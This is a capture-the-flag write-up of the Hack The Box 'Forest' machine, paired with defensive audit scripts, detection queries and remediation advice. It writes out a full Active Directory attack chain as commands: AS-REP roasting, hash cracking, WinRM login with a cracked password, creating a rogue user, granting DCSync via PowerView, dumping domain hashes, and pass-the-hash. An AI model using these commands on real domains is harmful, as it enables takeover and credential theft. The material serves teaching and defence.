Forest writeup
Box name: Forest
Difficulty: Easy
OS: Windows
Overview: Forest is an easy Windows machine that showcases a Domain Controller (DC) for a domain in which Exchange Server has been installed. The DC allows anonymous LDAP binds, which are used to enumerate domain objects. The password for a service account with Kerberos pre-authentication disabled can be cracked to gain a foothold. The service account is found to be a member of the Account Operators group, which can be used to add users to privileged Exchange groups. The Exchange group membership is leveraged to gain DCSync privileges on the domain and dump the NTLM hashes, compromising the system.
Link: https://app.hackthebox.com/machines/Forest?sort_by=created_at&sort_type=desc
Machine IP: 10.129.2.111
Ran rustscan against the machine.
rustscan -a 10.129.2.111 --ulimit 5000 -b 2000 -- -A -Pn

Definitely looks like an AD machine. I was able to list users as guest.

What seems interesting so far is that there are a bunch of mailboxes. Created a list with all of the users. Unfortunately no access to shares as guest. Added htb.local to /etc/hosts. Since we have users but no passwords yet, I attempted AS-REP roasting.
GetNPUsers.py htb.local/ -dc-ip 10.129.2.111 -usersfile users.txt -format hashcat -outputfile hashes.txt -no-pass

We get svc-alfresco’s hash. Running hashcat.
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

Evil-winrm’ed into the victim and got user.txt.
evil-winrm -i 10.129.2.111 -u svc-alfresco -p s3rvice

I checked privs and groups of this user and Account Operators and Privileged IT accounts look interesting.

I poked around and did more research and got stuck here. I ended up peeking at the writeup: “Exchange Windows Permissions group has WriteDacl privileges on the Domain. The WriteDACL privilege allows a user to add ACLs to an object. We can add users to this group and give them DCSync privileges.” This checks out too, as we saw a bunch of mailboxes earlier. I should start using BloodHound when I get stuck at these parts for AD machines to visualize and find a path. We can add a new user and provide those permissions.
net user kami kami123 /add /domain
net group 'Exchange Windows Permissions' kami /add
net localgroup 'Remote Management Users' kami /add
I uploaded PowerView.ps1 through evil-winrm.
upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
Then ran it giving kami DCsync perms.
. .\PowerView.ps1
$pass = ConvertTo-SecureString 'kami123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb.local\kami', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity kami -Rights DCSync
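As an added defender-side check (not part of the original writeup), the PowerShell below enumerates the domain object's DACL for exactly the rights abused in this step: the three replication extended rights that together make up DCSync, plus WriteDacl/GenericAll (and an unscoped ExtendedRight), which let a principal grant them. It assumes the RSAT ActiveDirectory module on a domain-joined host; the $ExpectedPrincipals allowlist is my assumption covering the stock DC-side principals and should be tuned per domain. On a box like this it would surface the Exchange Windows Permissions group (WriteDacl) and, once the command above has run, kami.

```powershell
# Added example, not from the writeup: list non-default principals holding
# DCSync-capable or DACL-editing rights on the domain root object.
Import-Module ActiveDirectory

# Schema GUIDs of the extended rights that make up DCSync.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-DomainDangerousAce {
    $domain   = Get-ADDomain
    $netbios  = $domain.NetBIOSName
    # Assumed allowlist: principals that legitimately hold these rights on a DC.
    $expectedPrincipals = @(
        'NT AUTHORITY\SYSTEM',
        'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
        'BUILTIN\Administrators',
        "$netbios\Domain Admins",
        "$netbios\Enterprise Admins",
        "$netbios\Domain Controllers",
        "$netbios\Enterprise Read-only Domain Controllers"
    )
    $rights = [System.DirectoryServices.ActiveDirectoryRights]
    $acl = Get-Acl -Path "AD:\$($domain.DistinguishedName)"

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $principal = $ace.IdentityReference.Value
        $guid      = $ace.ObjectType.ToString()

        # Classify the ACE; anything not matched is irrelevant to this path.
        $reason = $null
        if ($ReplicationRights.ContainsKey($guid)) {
            $reason = $ReplicationRights[$guid]
        } elseif ($ace.ActiveDirectoryRights.HasFlag($rights::GenericAll)) {
            $reason = 'GenericAll'
        } elseif ($ace.ActiveDirectoryRights.HasFlag($rights::WriteDacl)) {
            $reason = 'WriteDacl'
        } elseif ($ace.ActiveDirectoryRights.HasFlag($rights::ExtendedRight) -and
                  $ace.ObjectType -eq [guid]::Empty) {
            $reason = 'All extended rights'
        }
        if (-not $reason) { continue }

        [pscustomobject]@{
            Principal = $principal
            Right     = $reason
            Inherited = $ace.IsInherited
            Expected  = ($expectedPrincipals -contains $principal)
        }
    }
}

# Everything not on the allowlist is a finding to review (and to remove).
Get-DomainDangerousAce | Where-Object { -not $_.Expected } | Format-Table -AutoSize
```

Run it as any domain user (reading the domain DACL needs no special rights) and diff the output over time: a new principal with a replication GUID on the domain root is the persistence artifact this step leaves behind, and it survives until someone removes the ACE.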

Then ran secretsdump and we get all of the hashes.
secretsdump.py 'htb.local/kami:kami123@10.129.2.111'

Evil-winrm’ed into Administrator with the hash and grabbed root.txt.


GG
Attack Chain
1 – Reconnaissance: Ran RustScan and identified a domain-joined Windows machine with ports including 53 (DNS), 88 (Kerberos), 135 (MSRPC), 389 (LDAP), 445 (SMB), and 5985 (WinRM). Added htb.local to /etc/hosts. Enumerated domain users via anonymous LDAP and guest RPC access. Noted a large number of mailbox accounts indicating Exchange Server was installed. Built a full user list. Guest SMB access returned no readable shares.
2 – ASREPRoasting and credential recovery: Ran GetNPUsers against the enumerated user list to identify accounts with Kerberos pre-authentication disabled. The svc-alfresco service account returned an AS-REP hash. Cracked it with Hashcat using rockyou.
GetNPUsers.py htb.local/ -dc-ip 10.129.2.111 -usersfile users.txt -format hashcat -outputfile hashes.txt -no-pass
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt
Credentials recovered: svc-alfresco:s3rvice
3 – WinRM access and user flag: Authenticated via evil-winrm as svc-alfresco and retrieved user.txt. Reviewed the account’s group memberships and identified membership in Account Operators and Privileged IT Accounts as notable.
evil-winrm -i 10.129.2.111 -u svc-alfresco -p s3rvice
4 – Exchange Windows Permissions abuse and DCSync: Researched the Exchange group structure and identified that the Exchange Windows Permissions group held WriteDACL on the domain object. Used svc-alfresco’s Account Operators membership to create a new user and add them to Exchange Windows Permissions and Remote Management Users. Uploaded PowerView.ps1 via evil-winrm and used Add-DomainObjectAcl to grant the new user DCSync rights on the domain. Ran secretsdump to dump all domain hashes.
net user kami kami123 /add /domain
net group 'Exchange Windows Permissions' kami /add
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity kami -Rights DCSync
secretsdump.py 'htb.local/kami:kami123@10.129.2.111'
5 – Pass the hash as Administrator: Used the Administrator NTLM hash recovered from the DCSync dump with evil-winrm to authenticate and retrieved root.txt.
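Steps 2 and 4 of this chain are the two that leave a clear trace on the domain controller, so here is an added hunting script (mine, not part of the original writeup) that pulls both signatures out of the DC Security log: 4768 TGT requests with PreAuthType 0 (an AS-REP issued without pre-authentication, i.e. the account was just roasted) and 4662 directory-access events carrying the replication extended-right GUIDs from an account that is not a DC machine account (DCSync). It assumes it is run on a DC, or that $ComputerName is pointed at one, with "Audit Kerberos Authentication Service" and "Audit Directory Service Access" enabled; $Hours is an assumed lookback window.

```powershell
# Added example, not from the writeup: hunt the Security log for the
# AS-REP roast and DCSync steps of this attack chain.
$ComputerName = $env:COMPUTERNAME   # assumption: run on a DC, or set a DC name here
$Hours        = 24                  # assumption: lookback window
$since        = (Get-Date).AddHours(-$Hours)

# Extended-right GUIDs that appear in the Properties field of 4662 on a DCSync.
$ReplGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
)

# Turn an event's named EventData fields into a hashtable.
function Get-EventFields {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $fields = @{}
    $xml = [xml]$Event.ToXml()
    foreach ($d in $xml.Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
    return $fields
}

# 4662 with a replication GUID from a non-machine account (no trailing $).
function Find-DCSyncEvents {
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{
        LogName = 'Security'; Id = 4662; StartTime = $since
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $f   = Get-EventFields $_
        $hit = $ReplGuids | Where-Object { $f['Properties'] -match $_ }
        if ($hit -and $f['SubjectUserName'] -notmatch '\$$') {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Subject = "$($f['SubjectDomainName'])\$($f['SubjectUserName'])"
                Rights  = ($hit -join ',')
            }
        }
    }
}

# 4768 with PreAuthType 0: the KDC handed out an AS-REP with no pre-auth.
function Find-NoPreAuthTgtRequests {
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{
        LogName = 'Security'; Id = 4768; StartTime = $since
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $f = Get-EventFields $_
        if ($f['PreAuthType'] -eq '0') {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Account = $f['TargetUserName']
                Source  = $f['IpAddress']
            }
        }
    }
}

"== Possible DCSync (4662 with replication rights, non-DC subject) =="
Find-DCSyncEvents | Format-Table -AutoSize
"== TGTs issued without pre-authentication (4768, PreAuthType 0) =="
Find-NoPreAuthTgtRequests | Format-Table -AutoSize
```

Two caveats when turning this into a SIEM rule: legitimate non-DC replicators such as an Azure AD Connect sync account will show up in the first query and need an explicit allowlist, and a 4768/PreAuthType 0 event for a user account is worth alerting on even once, because a correctly configured domain should never issue one.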
Key Takeaways
- Anonymous LDAP bind enabling full user enumeration – The domain controller allowed unauthenticated LDAP queries returning all domain user objects. Anonymous LDAP bind must be disabled on all domain controllers and LDAP signing and channel binding must be enforced via Group Policy.
- ASREPRoasting due to pre-authentication disabled on svc-alfresco – The service account had Kerberos pre-authentication disabled allowing an unauthenticated attacker to request an AS-REP hash and crack it offline. Kerberos pre-authentication must be enabled on all accounts without exception and any service account requiring it disabled must use a password of at least 25 randomly generated characters.
- Weak service account password crackable with rockyou – The svc-alfresco password was in the rockyou wordlist. Service account passwords must be long randomly generated strings managed through a PAM solution and rotated regularly. A crackable service account password in an Exchange environment is a domain compromise waiting to happen.
- Exchange Windows Permissions group holding WriteDACL on the domain – The Exchange group’s WriteDACL right on the domain object allowed any member to grant themselves or others DCSync privileges. This is a well-documented Exchange privilege escalation path. Exchange permissions on the domain object must be audited and scoped down to the minimum required. Microsoft has released mitigations for this configuration which must be applied.
- Account Operators membership enabling user creation and group manipulation – svc-alfresco’s Account Operators membership allowed creating domain users and adding them to privileged groups, providing the pivot needed to abuse the Exchange WriteDACL right. Service accounts must never hold Account Operators or other privileged group memberships beyond what is explicitly required for their function.
Remediation
[Immediate] Disable anonymous LDAP bind: Configure all domain controllers to require authentication for LDAP queries. Set the dsHeuristics attribute to disable anonymous access and enforce LDAP signing and channel binding via Group Policy. This prevents unauthenticated user enumeration which is the first step in this attack chain.
[Immediate] Enable Kerberos pre-authentication on svc-alfresco: Enable pre-authentication on the svc-alfresco account immediately using Set-ADAccountControl -Identity svc-alfresco -DoesNotRequirePreAuth $false. Audit all domain accounts for the DONT_REQ_PREAUTH flag and enable pre-authentication on every account found. Rotate the svc-alfresco password to a randomly generated string of at least 25 characters.
[Immediate] Apply Microsoft Exchange security mitigations for WriteDACL: Apply the Microsoft-recommended Exchange domain permissions mitigations to remove unnecessary ACLs granted by the Exchange setup process. Run the provided mitigation script from Microsoft to scope down Exchange group permissions on the domain object. Audit all Exchange-related group memberships and their effective permissions on Active Directory objects.
[Immediate] Rotate all credentials recovered via DCSync: All domain account hashes obtained through the DCSync attack must be considered fully compromised. Initiate a domain-wide password reset for all privileged accounts and rotate the Administrator password to a randomly generated string managed through a PAM solution.
[Short-term] Remove svc-alfresco from Account Operators: Audit the svc-alfresco account and all other service accounts for membership in privileged built-in groups including Account Operators, Backup Operators, and Print Operators. Remove any memberships that are not explicitly required for the service function. Service accounts must operate under the principle of least privilege.
[Long-term] Deploy BloodHound and implement continuous AD attack path monitoring: Run BloodHound regularly to identify attack paths including Exchange WriteDACL abuse, ASREPRoastable accounts, and Account Operators membership chains. Implement SIEM detection rules for DCSync activity, WriteDACL modifications, and AS-REP requests without pre-authentication. Include Active Directory and Exchange privilege escalation paths in the regular penetration testing scope.
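The two account-level items above (the DONT_REQ_PREAUTH audit and the privileged built-in group audit) can be done in one pass. The script below is an added example of mine, not something from the writeup; it assumes the RSAT ActiveDirectory module, generalizes the single Set-ADAccountControl command above to every flagged account, and keeps the fix behind -WhatIf so the list can be reviewed (and the passwords rotated) before pre-authentication is switched back on.

```powershell
# Added example, not from the writeup: audit AS-REP-roastable accounts and
# service accounts sitting in sensitive built-in groups, then preview the fix.
Import-Module ActiveDirectory

# userAccountControl bit 0x400000 (4194304) is DONT_REQ_PREAUTH.
# 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule, so this is the
# same query an anonymous LDAP enumeration would run, used here as an audit.
function Get-AsRepRoastableAccount {
    Get-ADUser -LDAPFilter '(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' `
               -Properties PasswordLastSet |
        Select-Object SamAccountName, Enabled, PasswordLastSet
}

# Built-in groups whose members can create accounts or act on other accounts.
$SensitiveGroups = 'Account Operators', 'Backup Operators', 'Print Operators', 'Server Operators'

function Get-SensitiveGroupMember {
    foreach ($g in $SensitiveGroups) {
        Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue |
            ForEach-Object {
                [pscustomobject]@{ Group = $g; Member = $_.SamAccountName; Class = $_.objectClass }
            }
    }
}

# Re-enable pre-authentication; SupportsShouldProcess gives the function -WhatIf
# and -Confirm, which Set-ADAccountControl honours via $WhatIfPreference.
function Enable-PreAuth {
    [CmdletBinding(SupportsShouldProcess)]
    param([string[]]$SamAccountName)
    foreach ($s in $SamAccountName) {
        if ($PSCmdlet.ShouldProcess($s, 'Enable Kerberos pre-authentication')) {
            Set-ADAccountControl -Identity $s -DoesNotRequirePreAuth $false
        }
    }
}

"== Accounts with Kerberos pre-authentication disabled =="
$roastable = Get-AsRepRoastableAccount
$roastable | Format-Table -AutoSize

"== Members of sensitive built-in groups (a service account here is a finding) =="
Get-SensitiveGroupMember | Format-Table -AutoSize

# Preview only; rerun without -WhatIf after each account's password has been rotated.
Enable-PreAuth -SamAccountName $roastable.SamAccountName -WhatIf
```

Any account that must keep pre-authentication disabled for an application's sake should come out of the first list with a documented justification and the long random password the takeaways call for, since its AS-REP will keep being crackable offline for as long as the flag stays set.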